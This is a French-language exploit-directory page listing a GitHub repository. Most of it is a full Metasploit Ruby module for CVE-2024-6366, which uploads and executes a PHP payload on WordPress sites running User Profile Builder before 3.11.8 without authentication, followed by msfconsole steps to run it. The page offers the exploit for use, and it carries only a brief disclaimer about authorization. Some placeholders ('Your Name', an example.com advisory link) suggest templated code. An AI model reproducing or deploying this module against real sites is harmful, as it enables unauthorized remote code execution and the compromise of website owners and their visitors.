Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-6366 — Module d'exploitation Metasploit pour CVE-2024-6366, une exécution de code à distance par téléchargement de fichier non authentifié dans WordPress User Profile Builder avant 3.11.8, téléchargeant et exécutant une charge utile PHP. | Kitploit
Outils/GitHubGitHub/abdurahmon3236/cve-2024-6366
Frameworks d'ExploitationAnalyse des VulnérabilitésAnalyse de CodeExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubabdurahmon3236/cve-2024-6366

CVE-2024-6366

Module d'exploitation Metasploit pour CVE-2024-6366, une exécution de code à distance par téléchargement de fichier non authentifié dans WordPress User Profile Builder avant 3.11.8, téléchargeant et exécutant une charge utile PHP.

Voir le dépôt
24il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Pour créer un module Metasploit afin d'exploiter la vulnérabilité RCE dans le plugin WordPress User Profile Builder avant la version 3.11.8, nous devons tirer parti de l'absence d'autorisation appropriée dans la fonctionnalité de téléchargement de fichiers média. Voici comment créer un tel module Metasploit :

Module Metasploit

Enregistrez le code suivant sous le nom wordpress_user_profile_builder_rce.rb dans le répertoire modules/exploits/unix/webapp de votre installation de Metasploit Framework.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress User Profile Builder Unauthenticated File Upload RCE',
      'Description'    => %q{
        This module exploits a vulnerability in the User Profile Builder WordPress plugin before version 3.11.8.
        The plugin does not have proper authorization, allowing unauthenticated users to upload media files via
        the async upload functionality. This can be leveraged to upload and execute a malicious PHP payload.
      },
      'Author'         =>
        [
          'Your Name'  # OneArch
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2024-6366'],  # Replace with the actual CVE identifier
          ['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'WordPress User Profile Builder < 3.11.8', {} ]
        ],
      'DisclosureDate' => 'Aug 03 2024',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "The base path to the WordPress installation", '/']),
      ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path),
    })

    if res && res.body.include?('wp-content/plugins/user-profile-builder')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    php_payload = "<?php #{payload.encoded} ?>"
    data = Rex::MIME::Message.new
    data.add_part(php_payload, 'application/octet-stream', nil, "form-data; name=\"async-upload\"; filename=\"#{Rex::Text.rand_text_alpha(8..12)}.php\"")
    data.add_part('1', nil, nil, 'form-data; name="html-upload"')
    data.add_part('Upload', nil, nil, 'form-data; name="upload"')

    print_status("Uploading PHP payload...")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri(target_uri.path, 'wp-admin', 'async-upload.php'),
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => data.to_s
    })

    if res && res.code == 200 && res.body.include?('.php')
      php_path = res.body.match(/(\/wp-content\/uploads\/[0-9]+\/[0-9]+\/.*?\.php)/)[1]
      print_good("Payload uploaded successfully: #{php_path}")

      register_files_for_cleanup(php_path)
      execute_command("#{php_path}")
    else
      fail_with(Failure::UnexpectedReply, 'Failed to upload payload')
    end
  end

  def execute_command(php_path)
    print_status("Executing PHP payload...")
    send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, php_path)
    })
  end
end

Instructions d'utilisation

  1. Enregistrer le module : Enregistrez le module sous le nom wordpress_user_profile_builder_rce.rb dans le répertoire modules/exploits/unix/webapp de votre installation de Metasploit Framework.

    /path/to/metasploit-framework/modules/exploits/unix/webapp/wordpress_user_profile_builder_rce.rb
    
  2. Lancer Metasploit : Démarrez Metasploit Framework en ouvrant un terminal et en exécutant :

    msfconsole
    
  3. Utiliser le nouveau module : Dans la console Metasploit, chargez le nouveau module d'exploitation en utilisant la commande suivante :

    use exploit/unix/webapp/wordpress_user_profile_builder_rce
    
  4. Configurer et exécuter : Définissez les options nécessaires, telles que RHOSTS et TARGETURI. Ensuite, lancez l'exploit.

    msf6 > use exploit/unix/webapp/wordpress_user_profile_builder_rce
    msf6 exploit(unix/webapp/wordpress_user_profile_builder_rce) > set RHOSTS target_ip
    RHOSTS => target_ip
    msf6 exploit(unix/webapp/wordpress_user_profile_builder_rce) > set TARGETURI /
    TARGETURI => /
    msf6 exploit(unix/webapp/wordpress_user_profile_builder_rce) > run
    

Considérations importantes

  • Assurez-vous d'avoir les autorisations appropriées avant de tester ou d'exploiter un système.
  • Ce module est un modèle de base et peut nécessiter des modifications pour fonctionner avec une configuration spécifique ou pour atteindre un objectif particulier.
  • Testez toujours le module dans un environnement sûr et contrôlé avant de l'utiliser sur des systèmes de production.

Ce module Metasploit télécharge un fichier PHP malveillant sur l'installation WordPress vulnérable, puis l'exécute pour obtenir une exécution de code à distance. Ajustez la charge utile et le module selon la nature spécifique de la vulnérabilité et de l'environnement cible.

Télécharger l’outil